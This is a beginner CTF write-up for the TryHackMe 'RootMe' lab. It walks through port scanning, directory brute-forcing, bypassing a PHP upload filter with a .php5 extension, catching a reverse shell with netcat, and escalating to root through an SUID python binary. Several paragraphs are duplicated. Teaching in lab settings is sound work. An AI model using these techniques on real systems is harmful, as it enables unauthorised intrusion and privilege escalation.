TryHackMe CTF: RootMe
RootMe room is designed to be a beginner-friendly challenge for beginner hackers who are starting their journey in the ethical hacking and penetration testing domain. It focuses on the fundamentals of hacking methodologies, including enumeration, vulnerability scanning, and privilege escalation.
Room link: https://tryhackme.com/room/rrootme
Type: Free
Difficulty:
Easy Tools used in this write-up:- nmap - gobuster- msfvenom (optional) - netcat
We start our enumeration process by using nmap to detect open ports.
We see that both port 22 and 80 are open. We even used -sC and -sV to run default scripts on open ports and enumerate versions.
We start our enumeration process by using nmap to detect open ports.
We see that both port 22 and 80 are open. We even used -sC and -sV to run default scripts on open ports and enumerate versions. Nothing interesting found on the web server, so we run a directory brute-force attack using gobuster and used a default directory list found in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt on linux-based systems 
We immediately found two interesting directories uploads and panel
We immediately found two interesting directories uploads and panel After checking the pages on our browser we know that panel is a file uploading point and uploads is where usually the uploaded files are stored.
To know which programming language the web server uses, we try to navigate to the index page using different extensions (index.html index.aspx index.php) 
We notice that the server responded with the home page when we requested index.php which indicates that the server uses php programming language. Now we try to upload a simple php reverse shell, we can create a php reverse shell manually or use msfvenom to do the work for us. I'll create one manually. $ip is my ip address and $port is the port I'll be listening on to catch the shell. 
Then we try to upload it in /panel
We can see that it says that PHP files are not allowed, we try to bypass that check by changing the extension of the file from .php to something like .php5 (valid php extensions are php,php4,php5 and phtml but note that sometimes the web server doesn't execute such extensions) 
It worked with .php5! Now we set up our netcat listener to listen on the port we defined in our shell (in my case 4242)
Then we navigate to uploads and click on our reverse shell we uploaded
By doing so, we get a reverse shell on our terminal!
Now we can get the user flag. We got a shell as the web server user (www-data) which has limited privileges. So it's time to escalate our privileges to get a root shell! We look for SUID files using this command find / -user root -perm /4000 2>/dev/null which looks for SUID files owned by root user in the system. We send errors to /dev/null so we get clean output.
Python binary /usr/bin/python is unusual to be found as SUID. We can easily get a root shell by executing a shell using this python binary. To get the command we need to escalate our privileges using python binary, simply search for python on https://gtfobins.github.io/ and click on the SUID tag. Skip the first command and just the type the second one on the target machine.
We got a root shell! Now you can retrieve the root flag found in /root. My personal notes for the room (I write it in Obsidian):
We notice that the server responded with the home page when we requested index.php which indicates that the server uses php programming language. Now we try to upload a simple php reverse shell, we can create a php reverse shell manually or use msfvenom to do the work for us. I'll create one manually. $ip is my ip address and $port is the port I'll be listening on to catch the shell. Then we try to upload it in /panel We can see that it says that PHP files are not allowed, we try to bypass that check by changing the extension of the file from .php to something like .php5 (valid php extensions are php,php4,php5 and phtml but note that sometimes the web server doesn't execute such extensions) It worked with .php5! Now we set up our netcat listener to listen on the port we defined in our shell (in my case 4242) Then we navigate to uploads and click on our reverse shell we uploaded By doing so, we get a reverse shell on our terminal!Now we can get the user flag. We got a shell as the web server user (www-data) which has limited privileges. So it's time to escalate our privileges to get a root shell! We look for SUID files using this command find / -user root -perm /4000 2>/dev/null which looks for SUID files owned by root user in the system. We send errors to /dev/null so we get clean output.Python binary /usr/bin/python is unusual to be found as SUID. We can easily get a root shell by executing a shell using this python binary. To get the command we need to escalate our privileges using python binary, simply search for python on https://gtfobins.github.io/ and click on the SUID tag. Skip the first command and just the type the second one on the target machine. We got a root shell! Now you can retrieve the root flag found in /root. My personal notes for the room (I write it in Obsidian):
Comments
Post a Comment